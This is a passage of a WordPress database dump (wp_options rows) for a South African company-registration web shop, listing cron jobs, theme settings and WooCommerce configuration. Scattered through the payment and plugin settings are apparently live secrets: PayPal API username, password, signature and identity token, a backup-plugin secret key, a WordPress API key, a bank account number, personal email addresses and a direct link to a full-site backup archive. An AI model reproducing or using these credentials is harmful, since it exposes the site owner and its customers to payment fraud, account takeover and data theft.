18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567064628;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567065308;a:1:{s:24:\"bloom_lists_auto_refresh\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567065355;a:1:{s:13:\"et_pb_ab_cron\";a:1:{s:32:\"00d22c1b7e4ebe3222829a31b463ee35\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:1:{s:8:\"interval\";s:6:\"hourly\";}s:8:\"interval\";i:3600;}}}i:1567065455;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567066200;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"b1a1c950509adda0e8517c51bb44de9d\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1567066200;}}}}i:1567071447;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567071639;a:1:{s:32:\"caldera_forms_tracking_send_rows\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567072044;a:1:{s:24:\"bloom_lists_auto_refresh\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567074262;a:1:{s:32:\"caldera_forms_tracking_send_rows\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567075430;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567076726;a:1:{s:24:\"jp_purge_transients_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567080055;a:1:{s:14:\"wc_admin_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567080100;a:1:{s:33:\"woocommerce_cleanup_personal_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567080110;a:1:{s:30:\"woocommerce_tracker_send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567081785;a:1:{s:24:\"bloom_stats_auto_refresh\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567090900;a:1:{s:24:\"woocommerce_cleanup_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567090978;a:1:{s:21:\"wpo_plugin_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567091235;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567091440;a:1:{s:32:\"caldera_forms_tracking_send_rows\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567094776;a:1:{s:21:\"et_builder_fonts_cron\";a:1:{s:32:\"552cbb9d6515dadbbc4718ad75114f08\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{s:8:\"interval\";s:5:\"daily\";}s:8:\"interval\";i:86400;}}}i:1567096915;a:1:{s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567097855;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567101700;a:1:{s:28:\"woocommerce_cleanup_sessions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567108975;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567113596;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567115755;a:1:{s:13:\"et_pb_ab_cron\";a:1:{s:32:\"552cbb9d6515dadbbc4718ad75114f08\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{s:8:\"interval\";s:5:\"daily\";}s:8:\"interval\";i:86400;}}}i:1567116000;a:1:{s:27:\"woocommerce_scheduled_sales\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567116612;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567121371;a:1:{s:34:\"hurrytimer_evergreen_daily_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567147906;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567325400;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"60d0ebac77b7c5e9edd3a0b413a6d5cc\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1567325400;}}}}i:1567432800;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1567468800;a:1:{s:25:\"woocommerce_geoip_updater\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2678400;}}}i:1567518528;a:1:{s:15:\"wpo_cron_event2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:15:\"wpo_fortnightly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1209600;}}}i:1567584600;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"8f648d0c7a05865853fadfe1aaf74cd4\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1567584600;}}}}i:1568717660;a:1:{s:32:\"et_core_page_resource_auto_clear\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2678400;}}}s:7:\"version\";i:2;}','yes'),(456360,'_transient_timeout_cartflows_data_31300_72026cfe966d0b5ee80827ea5bc49294','1567017618','no'),(456361,'_transient_cartflows_data_31300_72026cfe966d0b5ee80827ea5bc49294','a:2:{s:7:\"flow_id\";s:5:\"31300\";s:5:\"steps\";a:2:{i:0;a:3:{s:2:\"id\";i:31362;s:5:\"title\";s:10:\"Checkout 2\";s:4:\"type\";s:8:\"checkout\";}i:1;a:3:{s:2:\"id\";i:31390;s:5:\"title\";s:11:\"Thank You 2\";s:4:\"type\";s:8:\"thankyou\";}}}','no'),(440820,'ai1wm_secret_key','rvc35PXlTzG8','yes'),(440821,'ai1wm_backups_labels','a:0:{}','yes'),(440822,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:362:\"<a href=\"https://companyregistration.online/wp-content/ai1wm-backups/companyregistration.online-20190724-071351-462.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"companyregistration.online\" download=\"companyregistration.online-20190724-071351-462.wpress\"><span>Download companyregistration.online</span><em>Size: 363 MB</em></a>\";}','yes'),(112,'uninstall_plugins','a:5:{s:23:\"wr-contactform/main.php\";a:2:{i:0;s:24:\"WR_Contactform_Installer\";i:1;s:23:\"on_uninstaller_function\";}s:17:\"wpclef/wpclef.php\";a:2:{i:0;s:9:\"ClefSetup\";i:1;s:16:\"uninstall_plugin\";}s:97:\"yikes-inc-easy-custom-woocommerce-product-tabs/yikes-inc-easy-custom-woocommerce-product-tabs.php\";s:45:\"uninstall_custom_product_tabs_for_woocommerce\";s:27:\"wp-optimize/wp-optimize.php\";s:21:\"wpo_uninstall_actions\";s:49:\"better-delete-revision/better-delete-revision.php\";s:13:\"bdr_uninstall\";}','no'),(113,'default_post_format','0','yes'),(114,'link_manager_enabled','1','yes'),(115,'finished_splitting_shared_terms','1','yes'),(116,'site_icon','31601','yes'),(117,'medium_large_size_w','768','yes'),(118,'medium_large_size_h','0','yes'),(119,'initial_db_version','15260','yes'),(121,'db_upgraded','','yes'),(136,'gd_quicksetup_options','a:2:{s:3:\"key\";s:0:\"\";s:7:\"api_url\";s:33:\"https://wpqs.secureserver.net/v1/\";}','yes'),(143,'recently_activated','a:0:{}','yes'),(440903,'woo-multi-currency_start_use','1','yes'),(150,'seed_csp4_settings_content','a:9:{s:6:\"status\";s:1:\"0\";s:4:\"logo\";s:89:\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web.png\";s:8:\"headline\";s:43:\"Get your company registered professionally.\";s:11:\"description\";s:303:\"<h2 style=\"text-align: center;\"><strong>The site is being revamped to improve the user experience.</strong></h2>\r\n<h2 style=\"text-align: center;\"><strong> Will be back up on the 7th August 2019\r\n</strong></h2>\r\n<h2 style=\"text-align: center;\"><strong>Apologies for any inconvenience caused</strong></h2>\";s:13:\"footer_credit\";s:1:\"0\";s:7:\"favicon\";s:0:\"\";s:9:\"seo_title\";s:0:\"\";s:15:\"seo_description\";s:0:\"\";s:12:\"ga_analytics\";s:0:\"\";}','yes'),(151,'seed_csp4_settings_design','a:12:{s:8:\"bg_color\";s:7:\"#fafafa\";s:8:\"bg_image\";s:0:\"\";s:8:\"bg_cover\";a:1:{i:0;s:1:\"1\";}s:9:\"bg_repeat\";s:8:\"repeat-x\";s:11:\"bg_position\";s:8:\"left top\";s:13:\"bg_attahcment\";s:5:\"fixed\";s:9:\"max_width\";s:0:\"\";s:10:\"text_color\";s:7:\"#666666\";s:10:\"link_color\";s:7:\"#27AE60\";s:14:\"headline_color\";s:7:\"#444444\";s:9:\"text_font\";s:6:\"_arial\";s:10:\"custom_css\";s:0:\"\";}','yes'),(152,'seed_csp4_settings_advanced','a:2:{s:14:\"header_scripts\";s:0:\"\";s:14:\"footer_scripts\";s:0:\"\";}','yes'),(180,'apollo_display_options','a:9:{s:10:\"launchdate\";s:16:\"2016/03/24 08:00\";s:16:\"automatic_launch\";s:2:\"on\";s:15:\"display_tagline\";s:2:\"on\";s:5:\"title\";s:8:\"Welcome!\";s:5:\"intro\";s:63:\"We are launching a new site very soon! Be sure to return later.\";s:5:\"video\";s:0:\"\";s:18:\"subscription_embed\";s:0:\"\";s:14:\"copyright_text\";s:44:\"Copyright company registration online 2016. \";s:4:\"role\";s:13:\"administrator\";}','yes'),(181,'apollo_order_options','a:5:{s:16:\"Count Down Timer\";s:16:\"count-down-timer\";s:5:\"Video\";s:5:\"video\";s:23:\"Secondary Title & Intro\";s:7:\"welcome\";s:23:\"Email Subscription Form\";s:9:\"subs-form\";s:12:\"Social Links\";s:12:\"social-links\";}','yes'),(186,'apollo_theme_options','a:4:{s:5:\"theme\";s:6:\"grunge\";s:4:\"font\";s:16:\"sans-serif-style\";s:7:\"typekit\";s:0:\"\";s:10:\"background\";s:111:\"https://companyregistration.online/wp-content/plugins/launchpad-by-obox/themes/apollo/images/bg/beachsunset.jpg\";}','yes'),(196,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(197,'akismet_strictness','0','yes'),(198,'akismet_show_user_comments_approved','0','yes'),(199,'wordpress_api_key','defb7e1935df','yes'),(219,'theme_mods_twentysixteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1457619191;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:0:{}s:19:\"primary-widget-area\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:21:\"secondary-widget-area\";a:0:{}s:24:\"first-footer-widget-area\";a:0:{}s:25:\"second-footer-widget-area\";a:0:{}s:24:\"third-footer-widget-area\";a:0:{}s:25:\"fourth-footer-widget-area\";a:0:{}}}}','yes'),(220,'current_theme','Divi','yes'),(221,'theme_mods_storefront','a:2:{i:0;b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1457724495;s:4:\"data\";a:13:{s:19:\"wp_inactive_widgets\";a:0:{}s:19:\"primary-widget-area\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:21:\"secondary-widget-area\";a:0:{}s:24:\"first-footer-widget-area\";a:0:{}s:25:\"second-footer-widget-area\";a:0:{}s:24:\"third-footer-widget-area\";a:0:{}s:25:\"fourth-footer-widget-area\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:8:\"header-1\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}}}}','yes'),(222,'theme_switched','','yes'),(223,'theme_switched_via_customizer','','yes'),(261,'theme_mods_responsive-childtheme-master','a:12:{i:0;b:0;s:12:\"header_image\";s:97:\"https://companyregistration.online/wp-content/uploads/2016/03/cropped-companyregistration-web.png\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:25;s:3:\"url\";s:97:\"https://companyregistration.online/wp-content/uploads/2016/03/cropped-companyregistration-web.png\";s:13:\"thumbnail_url\";s:97:\"https://companyregistration.online/wp-content/uploads/2016/03/cropped-companyregistration-web.png\";s:6:\"height\";i:136;s:5:\"width\";i:518;}s:18:\"nav_menu_locations\";a:4:{s:11:\"header-menu\";i:14;s:8:\"top-menu\";i:13;s:15:\"sub-header-menu\";i:0;s:11:\"footer-menu\";i:15;}s:21:\"et_pb_layouts_updated\";s:3:\"yes\";s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:30:\"et_pb_predefined_layouts_added\";s:2:\"on\";s:34:\"et_pb_predefined_layouts_version_2\";s:2:\"on\";s:21:\"et_pb_replace_content\";s:2:\"on\";s:18:\"custom_css_post_id\";i:-1;s:18:\"jetpack_custom_css\";a:3:{s:12:\"preprocessor\";s:0:\"\";s:7:\"replace\";b:0;s:13:\"content_width\";s:0:\"\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1496990658;s:4:\"data\";a:13:{s:19:\"wp_inactive_widgets\";a:0:{}s:12:\"main-sidebar\";a:4:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:38:\"woocommerce_recently_viewed_products-2\";i:3;s:32:\"woocommerce_top_rated_products-2\";}s:13:\"right-sidebar\";a:0:{}s:12:\"left-sidebar\";a:0:{}s:17:\"left-sidebar-half\";a:0:{}s:18:\"right-sidebar-half\";a:0:{}s:13:\"home-widget-1\";a:0:{}s:13:\"home-widget-2\";a:0:{}s:13:\"home-widget-3\";a:0:{}s:14:\"gallery-widget\";a:0:{}s:15:\"colophon-widget\";a:0:{}s:10:\"top-widget\";a:1:{i:0;s:8:\"search-4\";}s:13:\"footer-widget\";a:0:{}}}}','yes'),(262,'responsive_theme_options','a:35:{s:10:\"breadcrumb\";i:0;s:10:\"cta_button\";i:0;s:12:\"minified_css\";b:0;s:10:\"front_page\";i:0;s:13:\"home_headline\";N;s:16:\"home_subheadline\";N;s:17:\"home_content_area\";N;s:8:\"cta_text\";N;s:7:\"cta_url\";N;s:16:\"featured_content\";N;s:24:\"google_site_verification\";s:0:\"\";s:22:\"bing_site_verification\";s:0:\"\";s:23:\"yahoo_site_verification\";s:0:\"\";s:23:\"site_statistics_tracker\";s:0:\"\";s:11:\"twitter_uid\";s:0:\"\";s:12:\"facebook_uid\";s:0:\"\";s:12:\"linkedin_uid\";s:0:\"\";s:11:\"youtube_uid\";s:0:\"\";s:11:\"stumble_uid\";s:0:\"\";s:7:\"rss_uid\";s:0:\"\";s:15:\"google_plus_uid\";s:0:\"\";s:13:\"instagram_uid\";s:0:\"\";s:13:\"pinterest_uid\";s:0:\"\";s:8:\"yelp_uid\";s:0:\"\";s:9:\"vimeo_uid\";s:0:\"\";s:14:\"foursquare_uid\";s:0:\"\";s:21:\"responsive_inline_css\";s:0:\"\";s:25:\"responsive_inline_js_head\";s:0:\"\";s:27:\"responsive_inline_js_footer\";s:0:\"\";s:31:\"responsive_inline_css_js_footer\";s:0:\"\";s:26:\"static_page_layout_default\";s:7:\"default\";s:26:\"single_post_layout_default\";s:7:\"default\";s:31:\"blog_posts_index_layout_default\";s:7:\"default\";s:14:\"googleplus_uid\";s:0:\"\";s:15:\"stumbleupon_uid\";s:0:\"\";}','yes'),(267,'woocommerce_default_country','ZA:GP','yes'),(268,'woocommerce_allowed_countries','specific','yes'),(269,'woocommerce_specific_allowed_countries','a:1:{i:0;s:2:\"ZA\";}','yes'),(270,'woocommerce_default_customer_address','geolocation','yes'),(271,'woocommerce_demo_store','no','yes'),(272,'woocommerce_demo_store_notice','The site will be down for maintenance on the 17th April 2016 between 3pm and 5pm. Apologies for any inconvenience caused.','no'),(273,'woocommerce_currency','ZAR','yes'),(274,'woocommerce_currency_pos','left_space','yes'),(275,'woocommerce_price_thousand_sep',',','yes'),(276,'woocommerce_price_decimal_sep','.','yes'),(277,'woocommerce_price_num_decimals','2','yes'),(278,'woocommerce_weight_unit','kg','yes'),(279,'woocommerce_dimension_unit','cm','yes'),(280,'woocommerce_enable_review_rating','yes','no'),(281,'woocommerce_review_rating_required','yes','no'),(282,'woocommerce_review_rating_verification_label','yes','no'),(283,'woocommerce_review_rating_verification_required','yes','no'),(284,'woocommerce_shop_page_id','4','yes'),(285,'woocommerce_shop_page_display','both','yes'),(286,'woocommerce_category_archive_display','','yes'),(287,'woocommerce_default_catalog_orderby','menu_order','yes'),(288,'woocommerce_cart_redirect_after_add','yes','yes'),(289,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(290,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";i:1;}','yes'),(291,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"510\";s:6:\"height\";s:4:\"9999\";s:4:\"crop\";i:0;}','yes'),(292,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"157\";s:6:\"height\";s:3:\"157\";s:4:\"crop\";i:1;}','yes'),(293,'woocommerce_enable_lightbox','yes','yes'),(294,'woocommerce_manage_stock','no','yes'),(295,'woocommerce_hold_stock_minutes','','no'),(296,'woocommerce_notify_low_stock','no','no'),(297,'woocommerce_notify_no_stock','no','no'),(298,'woocommerce_stock_email_recipient','imraanmaw@gmail.com','no'),(299,'woocommerce_notify_low_stock_amount','2','no'),(300,'woocommerce_notify_no_stock_amount','0','no'),(301,'woocommerce_hide_out_of_stock_items','no','yes'),(302,'woocommerce_stock_format','no_amount','yes'),(303,'woocommerce_file_download_method','force','no'),(304,'woocommerce_downloads_require_login','yes','no'),(305,'woocommerce_downloads_grant_access_after_payment','yes','no'),(306,'woocommerce_calc_taxes','no','yes'),(307,'woocommerce_prices_include_tax','no','yes'),(308,'woocommerce_tax_based_on','shipping','yes'),(309,'woocommerce_shipping_tax_class','title','yes'),(310,'woocommerce_tax_round_at_subtotal','no','yes'),(312,'woocommerce_tax_display_shop','excl','yes'),(313,'woocommerce_tax_display_cart','excl','no'),(314,'woocommerce_price_display_suffix','','yes'),(315,'woocommerce_tax_total_display','itemized','no'),(316,'woocommerce_enable_coupons','yes','no'),(317,'woocommerce_calc_discounts_sequentially','no','no'),(318,'woocommerce_enable_guest_checkout','yes','no'),(319,'woocommerce_force_ssl_checkout','no','yes'),(320,'woocommerce_unforce_ssl_checkout','no','yes'),(321,'woocommerce_cart_page_id','5','yes'),(322,'woocommerce_checkout_page_id','6','yes'),(323,'woocommerce_terms_page_id','287','no'),(324,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(325,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(326,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(327,'woocommerce_calc_shipping','no','yes'),(328,'woocommerce_enable_shipping_calc','yes','no'),(329,'woocommerce_shipping_cost_requires_address','no','no'),(330,'woocommerce_ship_to_destination','billing','no'),(331,'woocommerce_ship_to_countries','disabled','yes'),(332,'woocommerce_specific_ship_to_countries','a:0:{}','yes'),(333,'woocommerce_myaccount_page_id','7','yes'),(334,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(335,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(336,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(337,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(338,'woocommerce_logout_endpoint','customer-logout','yes'),(339,'woocommerce_enable_signup_and_login_from_checkout','yes','no'),(340,'woocommerce_enable_myaccount_registration','yes','no'),(341,'woocommerce_enable_checkout_login_reminder','yes','no'),(342,'woocommerce_registration_generate_username','yes','no'),(343,'woocommerce_registration_generate_password','no','no'),(344,'woocommerce_email_from_name','www.companyregistration.online','no'),(345,'woocommerce_email_from_address','store@companyregistration.online','no'),(346,'woocommerce_email_header_image','https://companyregistration.online/wp-content/uploads/2016/03/companyregistration-business-card-e1457804924754.png','no'),(347,'woocommerce_email_footer_text','www.companyregistration.online','no'),(348,'woocommerce_email_base_color','#850e81','no'),(349,'woocommerce_email_background_color','#f5f5f5','no'),(350,'woocommerce_email_body_background_color','#f4f4f4','no'),(351,'woocommerce_email_text_color','#070707','no'),(352,'woocommerce_api_enabled','yes','yes'),(362,'widget_woocommerce_widget_cart','a:2:{i:2;a:2:{s:5:\"title\";s:4:\"Cart\";s:13:\"hide_if_empty\";i:1;}s:12:\"_multiwidget\";i:1;}','yes'),(363,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(364,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(365,'widget_woocommerce_price_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(366,'widget_woocommerce_product_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(367,'widget_woocommerce_product_search','a:2:{i:2;a:1:{s:5:\"title\";s:14:\"Product search\";}s:12:\"_multiwidget\";i:1;}','yes'),(368,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(369,'widget_woocommerce_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(370,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(371,'widget_woocommerce_recently_viewed_products','a:2:{i:2;a:2:{s:5:\"title\";s:24:\"Recently Viewed Products\";s:6:\"number\";i:10;}s:12:\"_multiwidget\";i:1;}','yes'),(372,'widget_woocommerce_top_rated_products','a:2:{i:2;a:2:{s:5:\"title\";s:18:\"Top Rated Products\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(375,'woocommerce_meta_box_errors','a:0:{}','yes'),(377,'woocommerce_paypal_settings','a:21:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:6:\"PayPal\";s:11:\"description\";s:85:\"Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.\";s:5:\"email\";s:19:\"zainub@mawinc.co.za\";s:8:\"testmode\";s:2:\"no\";s:5:\"debug\";s:2:\"no\";s:14:\"receiver_email\";s:19:\"imraanmaw@gmail.com\";s:14:\"identity_token\";s:59:\"LyQ8OSMyqzwJwXEBxVy70oLIm9HIpJCTgjaUs8-IL3U7LbOllhAOm1m38PC\";s:14:\"invoice_prefix\";s:3:\"WC-\";s:13:\"send_shipping\";s:2:\"no\";s:16:\"address_override\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:10:\"page_style\";s:0:\"\";s:12:\"api_username\";s:24:\"zainub_api1.mawinc.co.za\";s:12:\"api_password\";s:16:\"6YYQF85467Z8NLYF\";s:13:\"api_signature\";s:56:\"AfQCspE7E3ZUOlpLX1-ZlpR7NKgLAzhgyBb2r5hYrBjU2lS0NwjjG.Sq\";s:16:\"ipn_notification\";s:3:\"yes\";s:9:\"image_url\";s:0:\"\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";}','yes'),(378,'woocommerce_cheque_settings','a:4:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:12:\"EFT Payments\";s:11:\"description\";s:46:\"EFT Payment for www.companyregistration.online\";s:12:\"instructions\";s:475:\"An email will be sent with a link to complete the registration online or provide information via email once we have received proof of payment.\r\n\r\nBanking details are as follows:\r\n\r\n   Account Name: MAW Inc\r\n   Bank: FNB\r\n   Branch: Wierda Valley\r\n   Branch code: 260950\r\n   Account number: 62248573885\r\n\r\nNB: Ref#: The Purchasers Name and Surname\r\n\r\nPlease check you inbox or spam folder for emails for us.\r\n\r\nPS: Orders will remain incomplete until we have received payment.\";}','yes'),(379,'woocommerce_cod_settings','a:6:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:16:\"Cash on Delivery\";s:11:\"description\";s:28:\"Pay with cash upon delivery.\";s:12:\"instructions\";s:28:\"Pay with cash upon delivery.\";s:18:\"enable_for_methods\";a:0:{}s:18:\"enable_for_virtual\";s:3:\"yes\";}','yes'),(380,'woocommerce_bacs_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(390,'widget_black-studio-tinymce','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(391,'wcj_price_labels_enabled','no','yes'),(392,'wcj_call_for_price_enabled','no','yes'),(393,'wcj_call_for_price_text','<strong>Call for price</strong>','yes'),(394,'wcj_call_for_price_text_on_archive','<strong>Call for price</strong>','yes'),(395,'wcj_call_for_price_text_on_home','<strong>Call for price</strong>','yes'),(396,'wcj_call_for_price_text_on_related','<strong>Call for price</strong>','yes'),(397,'wcj_call_for_price_hide_sale_sign','yes','yes'),(398,'wcj_product_listings_enabled','no','yes'),(399,'wcj_product_listings_hide_cats_count_on_shop','no','yes'),(400,'wcj_product_listings_exclude_cats_on_shop','','yes'),(401,'wcj_product_listings_hide_empty_cats_on_shop','yes','yes'),(402,'wcj_product_listings_show_products_if_no_cats_on_shop','yes','yes'),(403,'wcj_product_listings_hide_cats_count_on_archive','no','yes'),(404,'wcj_product_listings_exclude_cats_on_archives','','yes'),(405,'wcj_product_listings_hide_empty_cats_on_archives','yes','yes'),(406,'wcj_product_listings_show_products_if_no_cats_on_archives','yes','yes'),(407,'wcj_sorting_enabled','no','yes'),(408,'wcj_sorting_remove_all_enabled','no','yes'),(409,'wcj_more_sorting_enabled','yes','yes'),(410,'wcj_sorting_by_name_asc_text','Sort by title: A to 